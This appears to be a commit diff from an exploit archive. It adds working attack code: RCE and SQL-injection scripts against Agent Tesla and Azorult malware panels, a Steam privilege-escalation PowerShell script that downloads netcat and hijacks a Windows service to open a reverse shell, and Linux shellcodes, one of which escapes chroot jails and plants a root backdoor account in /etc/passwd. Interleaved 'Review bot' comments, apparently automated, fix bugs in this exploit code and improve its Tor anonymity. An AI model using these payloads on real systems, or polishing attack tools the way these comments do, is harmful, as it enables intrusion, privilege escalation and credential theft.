DB: 2019-08-14

6 changes to exploits/shellcodes

Steam Windows Client - Local Privilege Escalation
Agent Tesla Botnet - Arbitrary Code Execution
AZORult Botnet - SQL Injection

Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)
Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode
Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode
This commit is contained in:
Offensive Security 2019-08-14 05:02:24 +00:00
parent a32e028b88
commit 998fb1eeec
8 changed files with 505 additions and 0 deletions

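--- a/exploits/php/remote/47243.py
+++ b/exploits/php/remote/47243.py
@@ -0,0 +1,54 @@
+import requests
+import argparse
+import base64
+# Agent Tesla C2 RCE by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+def get_args():
+parser = argparse.ArgumentParser(
+prog="agent_tesla_sploit.py",
+formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+epilog= '''
+This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
+''')
+parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
+parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+args = parser.parse_args()
+return args
+def pwn_target(target, command, proxy):
+requests.packages.urllib3.disable_warnings()
+proxies = {'http': proxy, 'https': proxy}
+print('[*] Probing...')
+get_params = {
+'table':'screens',
+'primary':'HWID',
+'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}',
+'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
+}
+target = target + '/server_side/scripts/server_processing.php'
+try:
+r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+print("[*] Your IP: {}".format(r.text))
+headers = {
+"User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+}
+r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
+result = r.json()['data'][-1]['HWID']
+print('[+] {}'.format(result))
+except:
+print("[-] ERROR: Something went wrong.")
+print(r.text)
+raise
+def main():
+print ()
+print ('Agent Tesla RCE by prsecurity.')
+args = get_args()
+pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
+if __name__ == '__main__':
+main()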
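Review bot: The bare `except:` at the end of `pwn_target` prints `r.text`, but `r` is only bound once the IP-check GET has succeeded, so a proxy or connection failure on that first request surfaces as a `NameError` that masks the real exception (and a bare `except` also swallows `KeyboardInterrupt`). I would bind `r = None` before the `try:`, narrow the clause to `except Exception as exc:`, and print `r.text if r is not None else exc` before the `raise`. Separately, the default proxy `socks5://localhost:9150` makes `requests` resolve the target hostname on the operator's machine, so the C2 domain is leaked to the local DNS resolver; for Tor the scheme should be `socks5h://` (and `requests[socks]`/PySocks has to be installed for either to work). The IP-check request itself goes to a third-party site in cleartext, which deserves a comment saying it is only a proxy sanity check and can be removed.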

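--- a/exploits/php/remote/47244.py
+++ b/exploits/php/remote/47244.py
@@ -0,0 +1,95 @@
+import requests
+import argparse
+import base64
+# Azorult 3.3.1 C2 SQLi by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+# change GUID and XOR key to specific beacon, can be extracted from a sample
+guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
+key = "\x03\x55\xae"
+def get_args():
+parser = argparse.ArgumentParser(
+prog="azorult_sploit.py",
+formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+epilog= '''
+This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
+''')
+parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
+parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
+parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+args = parser.parse_args()
+return args
+def CB_XORm(data, key):
+j=0
+key = list(key)
+data = list(data)
+tmp = list()
+for i in range(len(data)):
+tmp.append(chr(ord(data[i])^ord(key[j])))
+j += 1
+if j > (len(key)-1):
+j = 0
+return "".join(tmp)
+def pwn_target(target, num_records, proxy):
+requests.packages.urllib3.disable_warnings()
+proxies = {'http': proxy, 'https': proxy}
+try:
+r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+print("[*] Your IP: {}".format(r.text))
+headers = {
+"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+}
+print('[+] Getting URL, LOGIN AND PASS')
+data = [
+"|".join([
+"1","2","3","4","5","6","7","8","9","10","11","12"
+]),
+"\r\n".join([
+"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
+]),
+"c",
+"d",
+":".join(["'11","22"])
+]
+payload = CB_XORm(guid.join(data), key)
+r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+if r.text != "OK":
+print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+raise
+print('[+] Getting LOGIN/PASS')
+data = [
+"|".join([
+"1","2","3","4","5","6","7","8","9","10","11","12"
+]),
+"\r\n".join([
+"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
+]),
+"c",
+"d",
+":".join(["'11","22"])
+]
+payload = CB_XORm(guid.join(data), key)
+r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+if r.text != "OK":
+print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+raise
+print('[+] If this worked, you will see two new records in password table at guest.php')
+except:
+print("[-] ERROR: Something went wrong.")
+print(r.text)
+raise
+def main():
+print ()
+print ('Azorult 3.3.1 SQLi by prsecurity')
+args = get_args()
+pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
+if __name__ == '__main__':
+main()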
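Review bot: `main` reads `args.num_records`, but `get_args` registers the option as `-n/--id_record`, so argparse exposes it as `args.id_record` and the script dies with `AttributeError` before a single request is sent; the call should be `pwn_target(args.target.strip(), args.id_record.strip(), args.proxy.strip())`. The `headers` literal at the top of `pwn_target` is a one-element set rather than a dict (the `"User-agent":` key is missing), which `requests` cannot merge as headers; it should match the sibling script: `headers = {"User-agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"}`. The two bare `raise` statements inside the `try` body run with no active exception and only reach the handler because the resulting `RuntimeError` is caught by the bare `except:` below; `raise RuntimeError("unexpected response: " + r.text)` would say what actually went wrong. As in 47243.py, `r` is unbound in that handler when the IP-check GET itself fails, so `print(r.text)` there masks the original error.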


@ -0,0 +1,30 @@
$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
$RegDir = "C:\Windows\Temp\RegLN.exe"
$PayDir = "C:\Windows\Temp\payload.exe"
$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
$WebClient = New-Object System.Net.WebClient
If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
{
$WebClient.DownloadFile($PayDownload, $PayDir)
$WebClient.DownloadFile($RegDownload, $RegDir)
}
If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
{
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}
Else
{
Remove-Item -Path $SteamRegKey -Recurse
Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}
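Review bot: Neither branch restores the `msiserver` `ImagePath` after the exploit fires, so the Windows Installer service is left pointing at the netcat command line and stays broken once the session is over; capture the original before overwriting it, `$OrigImagePath = (Get-ItemProperty -Path $MSIRegKey -Name ImagePath).ImagePath`, and put it back after the final `Start-Service -Name "msiserver"` with `Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $OrigImagePath`. Both branches also repeat the same three service lines, which could sit once after the `If`/`Else` so the restore happens in one place. `nc.exe` and `RegLN.exe` are downloaded from a mutable `master` branch with no integrity check; pinning the URLs to a commit and comparing `Get-FileHash` output against known digests before `Start-Process` would stop the PoC from executing whatever that repository happens to serve. The payload connects back to `127.0.0.1 4444`, so a listener must already be running on the same host, which is worth a comment at the top of the script.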


@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port
47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port
47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,



@ -993,3 +993,6 @@ id,file,description,date,author,type,platform
47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86

1 id file description date author type platform
993 47200 shellcodes/linux_x86/47200.c Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes) 2019-08-01 Daniel Ortiz shellcode linux_x86
994 47201 shellcodes/linux_x86/47201.c Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes) 2019-08-01 Daniel Ortiz shellcode linux_x86
995 47202 shellcodes/linux_x86/47202.c Linux/x86 - Force Reboot Shellcode (51 bytes) 2019-08-01 Daniel Ortiz shellcode linux_x86
996 47239 shellcodes/linux/47239.c Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes) 2019-03-25 Hacker House shellcode linux
997 47240 shellcodes/linux_x86/47240.S Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode 2019-03-23 Hacker House shellcode linux_x86
998 47242 shellcodes/linux_x86/47242.asm Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode 2019-03-23 Hacker House shellcode linux_x86

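--- a/shellcodes/linux/47239.c
+++ b/shellcodes/linux/47239.c
@@ -0,0 +1,49 @@
+/* Alpha (AXP) Linux/Tru64 execve() shellcode
+ * ==========================================
+ * This shellcode uses the stack to store a generated
+ * "callsys" instruction, due to this it needs executable
+ * stack. To test on Linux use "execstack -s <bin>" and
+ * on Tru64 use "sysconfig -r proc executable_stack=1".
+ *
+ * Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
+ *
+ * -- Hacker Fantastic (https://hacker.house)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+unsigned char shellcode[] = {
+"\x80\xff\xde\x23" /* lda $sp,-128($sp) */
+"\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */
+"\x2f\x2f\x21\x20" /* sll $1, 0x20 */
+"\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */
+"\x69\x6e\x5f\x24" /* addq $1, $2, $1 */
+"\x2f\x62\x42\x20" /* stq $31, -32($sp) */
+"\x01\x04\x22\x40" /* stq $31, -24($sp) */
+"\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */
+"\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */
+"\xf8\xff\xfe\xb7" /* mov $sp, $16 */
+"\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */
+"\x10\x04\xfe\x47" /* stq $16, -40($sp) */
+"\x30\x15\x02\x42" /* mov $sp, $17 */
+"\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */
+"\x11\x04\xfe\x47" /* mov $sp, $18 */
+"\x31\x15\x25\x42" /* subq $18, 0x18, $18 */
+"\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */
+"\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */
+"\x3c\xff\x1f\x20" /* subq $0, $1, $0 */
+"\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */
+"\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */
+"\x84\xff\x3f\x20" /* subq $1, $2, $1 */
+"\x01\xff\x5f\x20" /* stl $1, -48($sp) */
+"\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */
+"\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */
+"\x3e\x15\xc6\x43"
+"\xc4\x3f\xde\x6b"
+};
+int main(){
+int (*func)();
+func = (int (*)())shellcode;
+func();
+}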
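Review bot: The per-word comments in `shellcode[]` drift out of step with the bytes beside them: every `ldil` in the listing is two machine words (`ldah` + `lda`), so `"\x73\x68\x3f\x24"` is the `ldah $1,0x6873` half of `ldil $1, 0x68732f2f`, the next word `"\x2f\x2f\x21\x20"` is its `lda` half, `"\x21\x17\x24\x48"` is the `sll $1, 0x20` that the line above claims to be, and the offset keeps growing until the last two words carry no comment at all. A reader disassembling this to verify the 108-byte count or to patch the `/bin//sh` string will be misled; either comment one instruction per word (splitting each `ldil` into its `ldah`/`lda` pair) or say in the header that the comments list the macro-level assembly rather than the encoded words. The executable-stack requirement for the generated `callsys` is documented, but `shellcode[]` itself is a `.data` global that `main` jumps into, so the harness presumably also depends on that segment being executable; a one-line comment on `main` stating what the `execstack` step is expected to cover would help.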


@ -0,0 +1,67 @@
# tolower() execve() /bin/sh -c (user supplied command)
# shellcode to evade tolower() and friends, requires %esi
# to reference a valid writeable address (usually does)
.text
.global _start
_start:
jmp data
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
start:
popl %edi
movl %edi, %ecx
xorl %eax,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
movl %eax,%es:(%esi)
pushl %es:(%esi)
pushw $0x632d
movl %esp,%edi
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %ecx,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %edi,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %ebx,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %esp,%esi
movl %esi,%ecx
xorl %eax, %eax
movb $0x08, %al
addb $0x03, %al
int $0x80
data:
call start
#command
.ascii "id"
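Review bot: The command after `data:` is emitted with `.ascii "id"`, which has no terminating NUL, yet its address is exactly what `call start` pushes and `popl %edi` turns into the `-c` argument, so `execve` reads past `id` into whatever follows the payload in memory; `.asciz "id"` fixes it, with the caveat that the NUL then becomes the payload's last byte and must survive the delivery path (the header should say the supplied command has to be NUL-terminated). The 26 `nop`s between `jmp data` and `start:` look deliberate rather than filler: by my count they push the `jmp` rel8 displacement to 0x67, just past the 0x41–0x5a range that `tolower()` rewrites, so a comment such as `# pad so the jmp rel8 (0x67) stays outside A-Z` would stop the next reader from deleting them. The `movl %eax,%es:(%esi)` / `pushl %es:(%esi)` detours are presumably there because the direct `pushl %reg` opcodes (0x50–0x57) fall inside A–Z and an immediate zero push would encode a NUL; that deserves a one-line comment the first time the pair appears, together with the already-stated requirement that `%esi` point at writable memory.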


@ -0,0 +1,204 @@
;# Description: SCORE - The ShellCORE
;# score is a complete shellcode for x86 processors running
;# linux. It is designed to help work further with an exploited
;# process.
;#
;# Coded by: prdelka
;#########################
;# [CORE] #
;#########################
;--- NOP Equivalent instruction
cld
cld
cld
cld
cld
cld
cld
cld
cld
cld
cld
cld
;--- core initialise
jmp $+0x06
pop edi
push edi
jmp edi
call $-0x04
;--- core prompt
pop edi
push 0x3e0a7964
push 0x61655220
push 0x65726f43
xor eax,eax
mov al,0x4
xor ebx,ebx
mov bl,0x1
mov ecx,esp
xor edx,edx
mov dl,0xc
int 0x80
;--- core read choice
xor eax,eax
mov ebp,esp
push eax
mov al,0x3
xor ebx,ebx
mov bl,0x1
mov ecx,ebp
xor edx,edx
mov dl,0x2
int 0x80
;--- core module selector
mov edx,ebp
;### [backdoor module] 'b'
cmp word[edx],0x0a62
je $+0x5e
;### [break-chroot-jail module] 'j'
cmp word[edx],0x0a6a
je $+0x59
;### [privilege restore module] 'p'
cmp word[edx],0x0a70
je $+0x37
;### [shellcode module] 's'
cmp word[edx],0x0a73
je $+0x14
;### [exit module] 'x'
cmp word[edx],0x0a78
je $+0x05
;--- core loop
push edi
jmp edi
;#########################
;# [MODULES] #
;#########################
;--- [exit module]
xor eax,eax
mov al,0x1
xor ebx,ebx
int 0x80
;--- [shellcode module]
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al,0xB
int 0x80
;### [core loop]
push edi
jmp edi
;--- [privilege restore module]
xor eax,eax
mov ah,0x17
shr eax,0x8
xor ebx,ebx
int 0x80
xor eax,eax
mov ah,0x2e
shr eax,0x8
xor ebx,ebx
int 0x80
;### [core loop]
push edi
jmp edi
;### [LONG backdoor module jump]
jmp $+0x46
;--- [break-chroot-jail]
xor eax,eax
push eax
push 0x6c69616a
mov ebx,esp
mov edx,esp
mov cx,0x2F3
mov al,0x27
int 0x80
xor eax,eax
push eax
mov ebx,edx
mov al,0x3d
int 0x80
push 0x2e2e2e2e
mov ebx,esp
add bl,0x2
mov edx,ebx
xor ecx,ecx
mov cl,0xff
mov al,0x0c
mov ebx,edx
int 0x80
loop $-0x06
mov ebx,edx
add bl,0x1
mov al,0x3d
int 0x80
;### [core loop]
push edi
jmp edi
;--- [backdoor module]
xor eax,eax
push eax
push 0x64777373
push 0x61702f2f
push 0x6374652f
mov esi,esp
xor edx,edx
xor ecx,ecx
mov cl,0x01
mov ebx,esi
xor eax,eax
mov al,0x5
int 0x80
push eax
mov esi,esp
xor eax,eax
mov al,0x13
mov ebx,[esi]
xor ecx,ecx
xor edx,edx
mov dl,0x2
int 0x80
xor eax,eax
mov al,0x4
mov ebx,[esi]
xor ecx,ecx
push ecx
push 0x0a687361
push 0x622f6e69
push 0x622f3a74
push 0x6f6f722f
push 0x3a676663
push 0x20726f66
push 0x20726573
push 0x75206d65
push 0x74737973
push 0x3a303a30
push 0x3a3a6766
push 0x63737973
mov ecx,esp
xor edx,edx
mov dl,0x30
int 0x80
xor eax,eax
mov al,0x6
mov ebx,[esi]
int 0x80
;### [core loop]
push edi
jmp edi
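Review bot: The module selector and the `jmp $+0x46` ahead of `break-chroot-jail` use hand-computed short displacements (`je $+0x5e`, `$+0x59`, `$+0x37`, `$+0x14`, `$+0x05`), so adding or removing a single byte in any module silently redirects the dispatch into the wrong module; putting a label on each `;--- [...]` header and writing `je backdoor_module` / `jmp short backdoor_module` should produce the same rel8 encodings while removing the arithmetic. In the chroot-break module `mov cx,0x2F3` passes 755 decimal (octal 1363) as the `mkdir` mode, which looks like an intended `0755`; the directory is still created, but `mov cx,755q` would say what was meant. The `loop $-0x06` in that module re-enters at `mov al,0x0c`, which only sets the low byte of `eax`, so the retry is correct while each `chdir("..")` returns 0 but leaves `0xffffffxx` in the upper bytes after any failure; an `xor eax,eax` at the loop head would fix that and is a case in point for labels, since it would also turn the hard-coded `$-0x06` into `$-0x08`. Every module ends in the `push edi` / `jmp edi` core loop, where `edi` is the prompt address recovered by the `call $-0x04` trick, and that convention is worth one comment next to `;--- core initialise`.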